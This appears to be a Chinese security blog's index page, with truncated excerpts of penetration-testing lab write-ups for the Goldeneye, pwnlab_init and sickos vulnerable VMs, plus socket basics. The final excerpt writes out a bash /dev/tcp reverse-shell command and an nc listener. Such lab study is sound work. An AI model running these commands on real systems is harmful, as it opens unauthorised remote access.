基本操作 1
gethostname() 返回host namegethostbyname(host) 通过host name得到IP地址packed = socket.inet_aton(ip_addr) 转换成16进制socket.inet.nota(packed) 将转换后的地址转换回来socket...
Golden eye 1.1 part 2
我们现在已经登录到了管理员页面 用wappalyzer查看使用的是什么服务 LMS moodle 查询如何查看版本https://www.isharkfly.com/t/moodle/4486 Google查询 moodle 2.2.3 exploit发现可以使用 e...
Goldeneye 1.1
实验环境攻击者 Kali 192.168.192.128受害者 Goldeneye1.1 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.164收集受害者服务详情nmap -sV -A 19...
pwnlab_init
实验环境攻击者 Kali 192.168.192.128受害者 pwnlab_init IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.160 收集受害者服务详情nmap -sV -A ...
sickos 1.1
实验环境攻击者 Kali 192.168.192.128受害者 sickos1.1 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.159 收集受害者服务详情nmap -sV -A 19...
交互式shell和稳定shell的建立
1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...